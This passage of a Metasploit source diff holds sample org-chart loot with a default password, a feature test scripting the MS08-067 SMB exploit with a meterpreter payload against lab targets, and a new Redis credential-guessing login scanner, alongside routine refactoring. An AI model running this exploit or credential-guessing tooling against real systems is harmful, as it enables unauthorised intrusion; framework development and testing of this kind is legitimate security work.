bertie.badger@goat.stu IT Leader: Badger + +[*] CSV Organisational Chart Information saved to: /usr/home/s/stuart/.msf4/loot/20151221175733_stufusdev_192.0.2.140_ad.orgchart_189769.txt +[*] Post module execution completed +``` + +The contents of the CSV file are shown below: + +``` +$ cat /usr/home/s/stuart/.msf4/loot/20151221175733_stufusdev_192.0.2.140_ad.orgchart_189769.txt +cn,description,title,phone,department,division,e-mail,company,reports_to +"IT Manager","","Deputy GOAT IT Director","","","","it.manager@goat.stu","","IT Director" +"IT Director","","Director of Goat IT","","","","it.director@goat.stu","","" +"IT Leader: Badger","","Team Leader of Blue Team Operations","","","","it.leader.badger@goat.stu","","IT Manager" +"IT Leader: Otter","","Team Leader: Offensive Operations","","","","it.leader.otter@goat.stu","","IT Manager" +"Oswold Otter (IT Team)","","Consultant","","","","oswold.otter@goat.stu","","IT Leader: Otter" +"Bertie Badger (IT Security Team)","Default pass is badger123","IT Security Team Deputy","","","","bertie.badger@goat.stu","","IT Leader: Badger" +``` + +When this was imported into Visio with default options set, it produced the following organisational chart: + +![screenshot_orgchart](https://cloud.githubusercontent.com/assets/12296344/11937572/f5906320-a80c-11e5-8faa-6439872df362.png) diff --git a/external/zsh/_msfconsole b/external/zsh/_msfconsole index 1a012fb62c..6cf529e91b 100644 --- a/external/zsh/_msfconsole +++ b/external/zsh/_msfconsole @@ -23,7 +23,6 @@ _arguments \ {-a,--ask}"[Ask before exiting Metasploit or accept 'exit -y']" \ "-c[Load the specified configuration file]:configuration file:_files" \ - {-d,--defanged}"[Execute the console as defanged]" \ {-E,--environment}"[Specify the database environment to load from the configuration]:environment:(production development)" \ {-h,--help}"[Show help text]" \ {-L,--real-readline}"[Use the system Readline library instead of RbReadline]" \ diff --git a/features/modules/exploit/smb/ms08_067_netapi.feature b/features/modules/exploit/smb/ms08_067_netapi.feature index e23730be1c..fa6001a720 100644 --- a/features/modules/exploit/smb/ms08_067_netapi.feature +++ b/features/modules/exploit/smb/ms08_067_netapi.feature @@ -1,181 +1,27 @@ -@wip +@targets @db Feature: MS08-067 netapi Background: Given a directory named "home" And I cd to "home" And a mocked home directory - Given I run `msfconsole` interactively - And I wait for stdout to contain "Free Metasploit Pro trial: http://r-7.co/trymsp" - Scenario: The MS08-067 Module should have the following options - When I type "use exploit/windows/smb/ms08_067_netapi" - And I type "show options" - And I type "exit" - Then the output should contain: + Scenario: The MS08-067 should get a session with bind_tcp + Given I ready the windows targets + Given a file named "ms08-067-bind.rc" with: """ - Module options (exploit/windows/smb/ms08_067_netapi): - - Name Current Setting Required Description - ---- --------------- -------- ----------- - RHOST yes The target address - RPORT 445 yes Set the SMB service port - SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) - - - Exploit target: - - Id Name - -- ---- - 0 Automatic Targeting - + + hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml') + self.run_single('use exploit/windows/smb/ms08_067_netapi') + self.run_single('set payload windows/meterpreter/bind_tcp') + hosts.each do |host| + self.run_single("set RHOST #{host['ipAddress']}") + self.run_single('run -j') + sleep 1 + end + self.run_single('sessions -K') + """ - - Scenario: The MS08-067 Module should have the following advanced options - When I type "use exploit/windows/smb/ms08_067_netapi" - And I type "show advanced" - And I type "exit" - Then the output should contain: - """ - Module advanced options: - - Name : CHOST - Current Setting: - Description : The local client address - - Name : CPORT - Current Setting: - Description : The local client port - - Name : ConnectTimeout - Current Setting: 10 - Description : Maximum number of seconds to establish a TCP connection - - Name : ContextInformationFile - Current Setting: - Description : The information file that contains context information - - Name : DCERPC::ReadTimeout - Current Setting: 10 - Description : The number of seconds to wait for DCERPC responses - - Name : DisablePayloadHandler - Current Setting: false - Description : Disable the handler code for the selected payload - - Name : EnableContextEncoding - Current Setting: false - Description : Use transient context when encoding payloads - - Name : NTLM::SendLM - Current Setting: true - Description : Always send the LANMAN response (except when NTLMv2_session is - specified) - - Name : NTLM::SendNTLM - Current Setting: true - Description : Activate the 'Negotiate NTLM key' flag, indicating the use of - NTLM responses - - Name : NTLM::SendSPN - Current Setting: true - Description : Send an avp of type SPN in the ntlmv2 client Blob, this allow - authentification on windows Seven/2008r2 when SPN is required - - Name : NTLM::UseLMKey - Current Setting: false - Description : Activate the 'Negotiate Lan Manager Key' flag, using the LM key - when the LM response is sent - - Name : NTLM::UseNTLM2_session - Current Setting: true - Description : Activate the 'Negotiate NTLM2 key' flag, forcing the use of a - NTLMv2_session - - Name : NTLM::UseNTLMv2 - Current Setting: true - Description : Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key - is true - - Name : Proxies - Current Setting: - Description : A proxy chain of format type:host:port[,type:host:port][...] - - Name : SMB::ChunkSize - Current Setting: 500 - Description : The chunk size for SMB segments, bigger values will increase - speed but break NT 4.0 and SMB signing - - Name : SMB::Native_LM - Current Setting: Windows 2000 5.0 - Description : The Native LM to send during authentication - - Name : SMB::Native_OS - Current Setting: Windows 2000 2195 - Description : The Native OS to send during authentication - - Name : SMB::VerifySignature - Current Setting: false - Description : Enforces client-side verification of server response signatures - - Name : SMBDirect - Current Setting: true - Description : The target port is a raw SMB service (not NetBIOS) - - Name : SMBDomain - Current Setting: . - Description : The Windows domain to use for authentication - - Name : SMBName - Current Setting: *SMBSERVER - Description : The NetBIOS hostname (required for port 139 connections) - - Name : SMBPass - Current Setting: - Description : The password for the specified username - - Name : SMBUser - Current Setting: - Description : The username to authenticate as - - Name : SSL - Current Setting: false - Description : Negotiate SSL for outgoing connections - - Name : SSLCipher - Current Setting: - Description : String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH" - - Name : SSLVerifyMode - Current Setting: PEER - Description : SSL verification method (Accepted: CLIENT_ONCE, - FAIL_IF_NO_PEER_CERT, NONE, PEER) - - Name : SSLVersion - Current Setting: SSL3 - Description : Specify the version of SSL that should be used (Accepted: SSL2, - SSL3, TLS1) - - Name : VERBOSE - Current Setting: false - Description : Enable detailed status messages - - Name : WORKSPACE - Current Setting: - Description : Specify the workspace for this module - - Name : WfsDelay - Current Setting: 0 - Description : Additional delay when waiting for a session - """ - - @targets - Scenario: Show RHOST/etc variable expansion from a config file - When I type "use exploit/windows/smb/ms08_067_netapi" - When RHOST is WINDOWS - And I type "set PAYLOAD windows/meterpreter/bind_tcp" - And I type "show options" - And I type "run" - And I type "exit" - And I type "exit" - Then the output should match /spider-wxp/ + When I run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit` + Then the 'Mdm::Host' table contains the expected targets + \ No newline at end of file diff --git a/features/step_definitions/targets.rb b/features/step_definitions/targets.rb deleted file mode 100644 index 7c14393d0e..0000000000 --- a/features/step_definitions/targets.rb +++ /dev/null @@ -1,10 +0,0 @@ -When /^targets are loaded$/ do - config_file = File.expand_path('features/support/targets.yml') - fail "Target config file #{config_file} does not exist" unless File.exists?(config_file) - @target_config = YAML.load_file(config_file) -end - -When /^(RHOSTS?) (?:are|is) (\S+)$/ do |type, target_type| - fail "No target type #{target_type}" unless @target_config.key?(target_type) - step "I type \"set #{type} #{@target_config[target_type]}\"" -end diff --git a/features/support/hooks.rb b/features/support/hooks.rb index ff8ec3133c..0707c96444 100644 --- a/features/support/hooks.rb +++ b/features/support/hooks.rb @@ -26,4 +26,9 @@ unless Bundler.settings.without.include?(:coverage) # set environment variable so child processes will merge their coverage data with parent process's coverage data. set_env('RUBYOPT', "#{ENV['RUBYOPT']} -r#{simplecov_setup_pathname}") end + + Before('@db') do |scenario| + dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname)) + ActiveRecord::Base.establish_connection(dbconfig["test"]) + end end diff --git a/features/support/targets.yml.example b/features/support/targets.yml.example index 75f4b9915d..0752a6cc7e 100644 --- a/features/support/targets.yml.example +++ b/features/support/targets.yml.example @@ -1,2 +1,7 @@ -WINDOWS: spider-wxp.vuln.lax.rapid7.com -LINUX: spider-ubuntu.vuln.lax.rapid7.com +windows: + - + hostname: wxpsp0 + ip: 127.0.0.100 + - + hostname: wxpsp2 + ip: 127.0.0.101 diff --git a/lib/metasploit/framework/command/console.rb b/lib/metasploit/framework/command/console.rb index 797d8dcdc0..cc28346152 100644 --- a/lib/metasploit/framework/command/console.rb +++ b/lib/metasploit/framework/command/console.rb @@ -80,7 +80,6 @@ class Metasploit::Framework::Command::Console < Metasploit::Framework::Command:: driver_options['DatabaseMigrationPaths'] = options.database.migrations_paths driver_options['DatabaseYAML'] = options.database.config driver_options['DeferModuleLoads'] = options.modules.defer_loads - driver_options['Defanged'] = options.console.defanged driver_options['DisableBanner'] = options.console.quiet driver_options['DisableDatabase'] = options.database.disable driver_options['LocalOutput'] = options.console.local_output diff --git a/lib/metasploit/framework/common_engine.rb b/lib/metasploit/framework/common_engine.rb index f098144dc7..e968b0f75f 100644 --- a/lib/metasploit/framework/common_engine.rb +++ b/lib/metasploit/framework/common_engine.rb @@ -36,7 +36,7 @@ module Metasploit::Framework::CommonEngine config.paths.add 'data/meterpreter', glob: '**/ext_*' config.paths.add 'modules' - config.active_support.deprecation = :notify + config.active_support.deprecation = :stderr # # `initializer`s diff --git a/lib/metasploit/framework/login_scanner/caidao.rb b/lib/metasploit/framework/login_scanner/caidao.rb index 28eb0a7c7b..1907f96a4a 100644 --- a/lib/metasploit/framework/login_scanner/caidao.rb +++ b/lib/metasploit/framework/login_scanner/caidao.rb @@ -43,6 +43,7 @@ module Metasploit def set_sane_defaults self.method = "POST" if self.method.nil? + super end # Actually doing the login. Called by #attempt_login diff --git a/lib/metasploit/framework/login_scanner/redis.rb b/lib/metasploit/framework/login_scanner/redis.rb new file mode 100644 index 0000000000..dc0d12f3b0 --- /dev/null +++ b/lib/metasploit/framework/login_scanner/redis.rb @@ -0,0 +1,91 @@ +require 'metasploit/framework/login_scanner/base' +require 'metasploit/framework/login_scanner/rex_socket' +require 'metasploit/framework/tcp/client' + +module Metasploit + module Framework + module LoginScanner + + # This is the LoginScanner class for dealing with REDIS. + # It is responsible for taking a single target, and a list of credentials + # and attempting them. It then saves the results. + + class Redis + include Metasploit::Framework::LoginScanner::Base + include Metasploit::Framework::LoginScanner::RexSocket + include Metasploit::Framework::Tcp::Client + + DEFAULT_PORT = 6379 + LIKELY_PORTS = [ DEFAULT_PORT ] + LIKELY_SERVICE_NAMES = [ 'redis' ] + PRIVATE_TYPES = [ :password ] + REALM_KEY = nil + + # This method can create redis command which can be read by redis server + def redis_proto(command_parts) + return if command_parts.blank? + command = "*#{command_parts.length}\r\n" + command_parts.each do |p| + command << "$#{p.length}\r\n#{p}\r\n" + end + command + end + + # This method attempts a single login with a single credential against the target + # @param credential [Credential] The credential object to attempt to login with + # @return [Metasploit::Framework::LoginScanner::Result] The LoginScanner Result object + def attempt_login(credential) + result_options = { + credential: credential, + status: Metasploit::Model::Login::Status::INCORRECT, + host: host, + port: port, + protocol: 'tcp', + service_name: 'redis' + } + + disconnect if self.sock + + begin + connect + select([sock], nil, nil, 0.4) + + command = redis_proto(['AUTH', "#{credential.private}"]) + sock.put(command) + result_options[:proof] = sock.get_once + + # No password - ( -ERR Client sent AUTH, but no password is set\r\n ) + # Invalid password - ( -ERR invalid password\r\n ) + # Valid password - (+OK\r\n) + + if result_options[:proof] && result_options[:proof] =~ /but no password is set/i + result_options[:status] = Metasploit::Model::Login::Status::NO_AUTH_REQUIRED + elsif result_options[:proof] && result_options[:proof] =~ /^-ERR invalid password/i + result_options[:status] = Metasploit::Model::Login::Status::INCORRECT + elsif result_options[:proof] && result_options[:proof][/^\+OK/] + result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL + end + + rescue Rex::ConnectionError, EOFError, Timeout::Error, Errno::EPIPE => e + result_options.merge!( + proof: e, + status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT + ) + end + disconnect if self.sock + ::Metasploit::Framework::LoginScanner::Result.new(result_options) + end + + private + + # (see Base#set_sane_defaults) + def set_sane_defaults + self.connection_timeout ||= 30 + self.port ||= DEFAULT_PORT + self.max_send_size ||= 0 + self.send_delay ||= 0 + end + end + end + end +end diff --git a/lib/metasploit/framework/login_scanner/ssh.rb b/lib/metasploit/framework/login_scanner/ssh.rb index 069d1de5ec..cdc4bf71c9 100644 --- a/lib/metasploit/framework/login_scanner/ssh.rb +++ b/lib/metasploit/framework/login_scanner/ssh.rb @@ -78,7 +78,7 @@ module Metasploit opt_hash ) end - rescue ::EOFError, Net::SSH::Disconnect, Rex::ConnectionError, ::Timeout::Error => e + rescue OpenSSL::Cipher::CipherError, ::EOFError, Net::SSH::Disconnect, Rex::ConnectionError, ::Timeout::Error => e result_options.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e) rescue Net::SSH::Exception result_options.merge!(status: Metasploit::Model::Login::Status::INCORRECT, proof: e) diff --git a/lib/metasploit/framework/parsed_options/console.rb b/lib/metasploit/framework/parsed_options/console.rb index 66052a00d6..0789cf06ae 100644 --- a/lib/metasploit/framework/parsed_options/console.rb +++ b/lib/metasploit/framework/parsed_options/console.rb @@ -10,7 +10,6 @@ class Metasploit::Framework::ParsedOptions::Console < Metasploit::Framework::Par options.console.commands = [] options.console.confirm_exit = false - options.console.defanged = false options.console.local_output = nil options.console.plugins = [] options.console.quiet = false @@ -40,10 +39,6 @@ class Metasploit::Framework::ParsedOptions::Console < Metasploit::Framework::Par options.console.confirm_exit = true end - option_parser.on('-d', '--defanged', 'Execute the console as defanged') do - options.console.defanged = true - end - option_parser.on('-L', '--real-readline', 'Use the system Readline library instead of RbReadline') do options.console.real_readline = true end diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index 503ca905d8..2fb8817399 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.11.9" + VERSION = "4.11.21" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash diff --git a/lib/msf/base/config.rb b/lib/msf/base/config.rb index 4878180280..ca31d16d87 100644 --- a/lib/msf/base/config.rb +++ b/lib/msf/base/config.rb @@ -27,7 +27,7 @@ class Config < Hash # @return [String] the base configuration directory def self.get_config_root - # Use MSFCFGDIR environment variable first. See feature request #5797 + # Use MSF_CFGROOT_CONFIG environment variable first. val = Rex::Compat.getenv('MSF_CFGROOT_CONFIG') if (val and File.directory?(val)) return val diff --git a/lib/msf/base/serializer/readable_text.rb b/lib/msf/base/serializer/readable_text.rb index e912cbb6f5..c4c2838cd1 100644 --- a/lib/msf/base/serializer/readable_text.rb +++ b/lib/msf/base/serializer/readable_text.rb @@ -400,8 +400,7 @@ class ReadableText 'Description' ]) - mod.options.sorted.each { |entry| - name, opt = entry + mod.options.sorted.each do |name, opt| val = mod.datastore[name] || opt.default next if (opt.advanced?) @@ -409,7 +408,7 @@ class ReadableText next if (missing && opt.valid?(val)) tbl << [ name, opt.display_value(val), opt.required? ? "yes" : "no", opt.desc ] - } + end return tbl.to_s end @@ -420,24 +419,23 @@ class ReadableText # @param indent [String] the indentation to use. # @return [String] the string form of the information. def self.dump_advanced_options(mod, indent = '') - output = '' - pad = indent + tbl = Rex::Ui::Text::Table.new( + 'Indent' => indent.length, + 'Columns' => + [ + 'Name', + 'Current Setting', + 'Required', + 'Description' + ]) - mod.options.sorted.each { |entry| - name, opt = entry + mod.options.sorted.each do |name, opt| + next unless opt.advanced? + val = mod.datastore[name] || opt.default + tbl << [ name, opt.display_value(val), opt.required? ? "yes" : "no", opt.desc ] + end - next if (!opt.advanced?) - - val = mod.datastore[name] || opt.default.to_s - desc = word_wrap(opt.desc, indent.length + 3) - desc = desc.slice(indent.length + 3, desc.length) - - output << pad + "Name : #{name}\n" - output << pad + "Current Setting: #{val}\n" - output << pad + "Description : #{desc}\n" - } - - return output + return tbl.to_s end # Dumps the evasion options associated with the supplied module. @@ -446,25 +444,23 @@ class ReadableText # @param indent [String] the indentation to use. # @return [String] the string form of the information. def self.dump_evasion_options(mod, indent = '') - output = '' - pad = indent + tbl = Rex::Ui::Text::Table.new( + 'Indent' => indent.length, + 'Columns' => + [ + 'Name', + 'Current Setting', + 'Required', + 'Description' + ]) - mod.options.sorted.each { |entry| - name, opt = entry + mod.options.sorted.each do |name, opt| + next unless opt.evasion? + val = mod.datastore[name] || opt.default + tbl << [ name, opt.display_value(val), opt.required? ? "yes" : "no", opt.desc ] + end - next if (!opt.evasion?) - - val = mod.datastore[name] || opt.default || '' - - desc = word_wrap(opt.desc, indent.length + 3) - desc = desc.slice(indent.length + 3, desc.length) - - output << pad + "Name : #{name}\n" - output << pad + "Current Setting: #{val}\n" - output << pad + "Description : #{desc}\n" - } - - return output + return tbl.to_s end # Dumps the references associated with the supplied module. @@ -524,18 +520,18 @@ class ReadableText def self.dump_sessions(framework, opts={}) ids = (opts[:session_ids] || framework.sessions.keys).sort verbose = opts[:verbose] || false + show_extended = opts[:show_extended] || false indent = opts[:indent] || DefaultIndent col = opts[:col] || DefaultColumnWrap return dump_sessions_verbose(framework, opts) if verbose - columns = - [ - 'Id', - 'Type', - 'Information', - 'Connection' - ] + columns = [] + columns << 'Id' + columns << 'Type' + columns << 'Checkin?' if show_extended + columns << 'Information' + columns << 'Connection' tbl = Rex::Ui::Text::Table.new( 'Indent' => indent, @@ -551,11 +547,22 @@ class ReadableText sinfo = sinfo[0,77] + "..." end - row = [ session.sid.to_s, session.type.to_s, sinfo, session.tunnel_to_s + " (#{session.session_host})" ] - if session.respond_to? :platform - row[1] << (" " + session.platform) + row = [] + row << session.sid.to_s + row << session.type.to_s + row[-1] << (" " + session.platform) if session.respond_to?(:platform) + + if show_extended + if session.respond_to?(:last_checkin) && session.last_checkin + row << "#{(Time.now.to_i - session.last_checkin.to_i)}s ago" + else + row << '?' + end end + row << sinfo + row << session.tunnel_to_s + " (#{session.session_host})" + tbl << row } diff --git a/lib/msf/base/sessions/command_shell.rb b/lib/msf/base/sessions/command_shell.rb index d22ac17dbc..86b5ab5e68 100644 --- a/lib/msf/base/sessions/command_shell.rb +++ b/lib/msf/base/sessions/command_shell.rb @@ -216,7 +216,7 @@ class CommandShell end end - if (datastore['InitialAutoRunScript'] && datastore['InitialAutoRunScript'].empty? == false) + if datastore['InitialAutoRunScript'] && !datastore['InitialAutoRunScript'].empty? args = Shellwords.shellwords( datastore['InitialAutoRunScript'] ) print_status("Session ID #{sid} (#{tunnel_to_s}) processing InitialAutoRunScript '#{datastore['InitialAutoRunScript']}'") execute_script(args.shift, *args) diff --git a/lib/msf/base/sessions/meterpreter_options.rb b/lib/msf/base/sessions/meterpreter_options.rb index 789f25c801..b2863874e8 100644 --- a/lib/msf/base/sessions/meterpreter_options.rb +++ b/lib/msf/base/sessions/meterpreter_options.rb @@ -37,13 +37,13 @@ module MeterpreterOptions framework.sessions.schedule Proc.new { # Configure unicode encoding before loading stdapi - session.encode_unicode = ( datastore['EnableUnicodeEncoding'] ? true : false ) + session.encode_unicode = datastore['EnableUnicodeEncoding'] session.init_ui(self.user_input, self.user_output) valid = true - if datastore['AutoVerifySession'] == true + if datastore['AutoVerifySession'] if not session.is_valid_session?(datastore['AutoVerifySessionTimeout'].to_i) print_error("Meterpreter session #{session.sid} is not valid and will be closed") valid = false @@ -52,7 +52,7 @@ module MeterpreterOptions if valid - if datastore['AutoLoadStdapi'] == true + if datastore['AutoLoadStdapi'] session.load_stdapi @@ -72,7 +72,7 @@ module MeterpreterOptions end [ 'InitialAutoRunScript', 'AutoRunScript' ].each do |key| - if (datastore[key].empty? == false) + if !datastore[key].empty? args = Shellwords.shellwords( datastore[key] ) print_status("Session ID #{session.sid} (#{session.tunnel_to_s}) processing #{key} '#{datastore[key]}'") session.execute_script(args.shift, *args) diff --git a/lib/msf/base/sessions/vncinject_options.rb b/lib/msf/base/sessions/vncinject_options.rb index 05962133fc..d86a5f4dbd 100644 --- a/lib/msf/base/sessions/vncinject_options.rb +++ b/lib/msf/base/sessions/vncinject_options.rb @@ -84,7 +84,7 @@ module VncInjectOptions print_status("Local TCP relay started.") # If the AUTOVNC flag is set, launch VNC viewer. - if (datastore['AUTOVNC'] == true) + if datastore['AUTOVNC'] if (session.autovnc(datastore['ViewOnly'])) print_status("Launched vncviewer.") else diff --git a/lib/msf/base/simple/framework/module_paths.rb b/lib/msf/base/simple/framework/module_paths.rb index d2ba08fc3f..4b91f1b15b 100644 --- a/lib/msf/base/simple/framework/module_paths.rb +++ b/lib/msf/base/simple/framework/module_paths.rb @@ -21,7 +21,7 @@ module Msf allowed_module_paths << Msf::Config.user_module_directory end - Rails.application.railties.engines.each do |engine| + ::Rails::Engine.subclasses.map(&:instance).each do |engine| extract_engine_module_paths(engine).each do |path| allowed_module_paths << path end diff --git a/lib/msf/core/auxiliary/crawler.rb b/lib/msf/core/auxiliary/crawler.rb index e52ff259de..4fd18ca9c3 100644 --- a/lib/msf/core/auxiliary/crawler.rb +++ b/lib/msf/core/auxiliary/crawler.rb @@ -44,7 +44,7 @@ module Auxiliary::HttpCrawler OptString.new('BasicAuthPass', [false, 'The HTTP password to specify for basic authentication']), OptString.new('HTTPAdditionalHeaders', [false, "A list of additional headers to send (separated by \\x01)"]), OptString.new('HTTPCookie', [false, "A HTTP cookie header to send with each request"]), - OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'Auto', ['Auto', 'SSL2', 'SSL23', 'SSL3', 'TLS1']]), + Opt::SSLVersion ], self.class ) diff --git a/lib/msf/core/auxiliary/redis.rb b/lib/msf/core/auxiliary/redis.rb index 20714c8eb3..9867ad0664 100644 --- a/lib/msf/core/auxiliary/redis.rb +++ b/lib/msf/core/auxiliary/redis.rb @@ -20,7 +20,7 @@ module Msf register_options( [ Opt::RPORT(6379), - OptString.new('Password', [false, 'Redis password for authentication test', 'foobared']) + OptString.new('PASSWORD', [false, 'Redis password for authentication test', 'foobared']) ] ) @@ -48,29 +48,29 @@ module Msf def redis_command(*commands) command_string = printable_redis_response(commands.join(' ')) unless (command_response = send_redis_command(*commands)) - vprint_error("#{peer} -- no response to '#{command_string}'") + vprint_error("No response to '#{command_string}'") return end if /(?ERR operation not permitted|NOAUTH Authentication required)/i =~ command_response fail_with(::Msf::Module::Failure::BadConfig, "#{peer} requires authentication but Password unset") unless datastore['Password'] - vprint_status("#{peer} -- requires authentication (#{printable_redis_response(auth_response, false)})") - if (auth_response = send_redis_command('AUTH', datastore['Password'])) + vprint_status("Requires authentication (#{printable_redis_response(auth_response, false)})") + if (auth_response = send_redis_command('AUTH', datastore['PASSWORD'])) unless auth_response =~ /\+OK/ - vprint_error("#{peer} -- authentication failure: #{printable_redis_response(auth_response)}") + vprint_error("Authentication failure: #{printable_redis_response(auth_response)}") return end - vprint_status("#{peer} -- authenticated") + vprint_status("Authenticated") unless (command_response = send_redis_command(*commands)) - vprint_error("#{peer} -- no response to '#{command_string}'") + vprint_error("No response to '#{command_string}'") return end else - vprint_status("#{peer} -- authentication failed; no response") + vprint_status("Authentication failed; no response") return end end - vprint_status("#{peer} -- redis command '#{command_string}' got '#{printable_redis_response(command_response)}'") + vprint_status("Redis command '#{command_string}' got '#{printable_redis_response(command_response)}'") command_response end diff --git a/lib/msf/core/auxiliary/scanner.rb b/lib/msf/core/auxiliary/scanner.rb index ac4991cbf0..43b4c4c905 100644 --- a/lib/msf/core/auxiliary/scanner.rb +++ b/lib/msf/core/auxiliary/scanner.rb @@ -42,6 +42,11 @@ def check end +def peer + # IPv4 addr can be 16 chars + 1 for : and + 5 for port + super.ljust(21) +end + # # The command handler when launched from the console # diff --git a/lib/msf/core/data_store.rb b/lib/msf/core/data_store.rb index f4da1911e0..81a3e2ed55 100644 --- a/lib/msf/core/data_store.rb +++ b/lib/msf/core/data_store.rb @@ -13,6 +13,7 @@ class DataStore < Hash # Initializes the data store's internal state. # def initialize() + @options = Hash.new @imported = Hash.new @imported_by = Hash.new end @@ -26,6 +27,16 @@ class DataStore < Hash @imported[k] = false @imported_by[k] = nil + opt = @options[k] + unless opt.nil? + if opt.validate_on_assignment? + unless opt.valid?(v) + raise OptionValidateError.new(["Value '#{v}' is not valid for option '#{k}'"]) + end + v = opt.normalize(v) + end + end + super(k,v) end @@ -65,17 +76,11 @@ class DataStore < Hash # all of the supplied options # def import_options(options, imported_by = nil, overwrite = false) - options.each_option { |name, opt| - # If there's already a value defined for this option, then skip it - # and don't import it. - next if self.has_key?(name) and overwrite == false - - # If the option has a default value, import it, but only if the - # datastore doesn't already have a value set for it. - if ((opt.default != nil) and (overwrite or self[name] == nil)) - import_option(name, opt.default.to_s, true, imported_by) + options.each_option do |name, opt| + if self[name].nil? || overwrite + import_option(name, opt.default, true, imported_by, opt) end - } + end end # @@ -124,13 +129,14 @@ class DataStore < Hash # def import_options_from_hash(option_hash, imported = true, imported_by = nil) option_hash.each_pair { |key, val| - import_option(key, val.to_s, imported, imported_by) + import_option(key, val, imported, imported_by) } end - def import_option(key, val, imported=true, imported_by=nil) + def import_option(key, val, imported=true, imported_by=nil, option=nil) self.store(key, val) + @options[key] = option @imported[key] = imported @imported_by[key] = imported_by end diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb index 60d421b617..4e4ba8315c 100644 --- a/lib/msf/core/db_manager.rb +++ b/lib/msf/core/db_manager.rb @@ -163,14 +163,4 @@ class Msf::DBManager true end - - # Mainly, it's Ruby 1.9.1 that cause a lot of problems now, along with Ruby 1.8.6. - # Ruby 1.8.7 actually seems okay, but why tempt fate? Let's say 1.9.3 and beyond. - def warn_about_rubies - if ::RUBY_VERSION =~ /^1\.9\.[012]($|[^\d])/ - $stderr.puts "**************************************************************************************" - $stderr.puts "Metasploit requires at least Ruby 1.9.3. For an easy upgrade path, see https://rvm.io/" - $stderr.puts "**************************************************************************************" - end - end end diff --git a/lib/msf/core/db_manager/import.rb b/lib/msf/core/db_manager/import.rb index c93fb6cb5b..3a243fdfb1 100644 --- a/lib/msf/core/db_manager/import.rb +++ b/lib/msf/core/db_manager/import.rb @@ -16,7 +16,8 @@ module Msf::DBManager::Import autoload :Acunetix, 'msf/core/db_manager/import/acunetix' autoload :Amap, 'msf/core/db_manager/import/amap' autoload :Appscan, 'msf/core/db_manager/import/appscan' - autoload :Burp, 'msf/core/db_manager/import/burp' + autoload :BurpIssue, 'msf/core/db_manager/import/burp_issue' + autoload :BurpSession, 'msf/core/db_manager/import/burp_session' autoload :CI, 'msf/core/db_manager/import/ci' autoload :Foundstone, 'msf/core/db_manager/import/foundstone' autoload :FusionVM, 'msf/core/db_manager/import/fusion_vm' @@ -41,7 +42,8 @@ module Msf::DBManager::Import include Msf::DBManager::Import::Acunetix include Msf::DBManager::Import::Amap include Msf::DBManager::Import::Appscan - include Msf::DBManager::Import::Burp + include Msf::DBManager::Import::BurpIssue + include Msf::DBManager::Import::BurpSession include Msf::DBManager::Import::CI include Msf::DBManager::Import::Foundstone include Msf::DBManager::Import::FusionVM @@ -252,6 +254,9 @@ module Msf::DBManager::Import elsif (firstline.index("")) @import_filedata[:type] = "Retina XML" return :retina_xml + elsif (firstline.index(//)) + @import_filedata[:type] = "OpenVAS XML" + return :openvas_new_xml elsif (firstline.index(//)) @import_filedata[:type] = "OpenVAS XML" return :openvas_new_xml @@ -267,6 +272,9 @@ module Msf::DBManager::Import elsif (data[0,1024] =~ / wspace, :host => addr, :state => Msf::HostState::Alive) - name = p[1].strip - port = p[2].to_i - proto = p[3].downcase + if p + name = p[1].strip + port = p[2].to_i + proto = p[3].downcase + else + port = nil + end info = { :workspace => wspace, :host => hobj, :port => port, :proto => proto, :task => task } - if name != "unknown" and name[-1,1] != "?" + if name and name != "unknown" and name[-1,1] != "?" info[:name] = name end report_service(info) diff --git a/lib/msf/core/db_manager/import/open_vas.rb b/lib/msf/core/db_manager/import/open_vas.rb index 9991d19e86..f2ef38929f 100644 --- a/lib/msf/core/db_manager/import/open_vas.rb +++ b/lib/msf/core/db_manager/import/open_vas.rb @@ -29,6 +29,6 @@ module Msf::DBManager::Import::OpenVAS filename = args[:filename] wspace = args[:wspace] || workspace - raise Msf::DBImportError.new("No OpenVAS XML support. Please submit a patch to msfdev[at]metasploit.com") + raise Msf::DBImportError.new("No OpenVas XML support. Please submit a patch to msfdev[at]metasploit.com") end end diff --git a/lib/msf/core/db_manager/migration.rb b/lib/msf/core/db_manager/migration.rb index 5d98eb960e..4c6430bd52 100644 --- a/lib/msf/core/db_manager/migration.rb +++ b/lib/msf/core/db_manager/migration.rb @@ -10,7 +10,7 @@ module Msf::DBManager::Migration "the .bundle/config manually and then `bundle install`" end - Rails.application.railties.engines.each do |engine| + ::Rails::Engine.subclasses.map(&:instance).each.each do |engine| migrations_paths = engine.paths['db/migrate'].existent_directories migrations_paths.each do |migrations_path| diff --git a/lib/msf/core/db_manager/module_cache.rb b/lib/msf/core/db_manager/module_cache.rb index 5e23cb6d2c..06af2be5be 100644 --- a/lib/msf/core/db_manager/module_cache.rb +++ b/lib/msf/core/db_manager/module_cache.rb @@ -201,7 +201,7 @@ module Msf::DBManager::ModuleCache end end - query = Mdm::Module::Detail.scoped + query = Mdm::Module::Detail.all ActiveRecord::Base.connection_pool.with_connection do # Although AREL supports taking the union or two queries, the ActiveRecord where syntax only supports @@ -214,7 +214,7 @@ module Msf::DBManager::ModuleCache when 'author' formatted_values = match_values(value_set) - query = query.includes(:authors) + query = query.includes(:authors).references(:authors) module_authors = Mdm::Module::Author.arel_table union_conditions << module_authors[:email].matches_any(formatted_values) union_conditions << module_authors[:name].matches_any(formatted_values) @@ -227,10 +227,10 @@ module Msf::DBManager::ModuleCache when 'os', 'platform' formatted_values = match_values(value_set) - query = query.includes(:platforms) + query = query.includes(:platforms).references(:platforms) union_conditions << Mdm::Module::Platform.arel_table[:name].matches_any(formatted_values) - query = 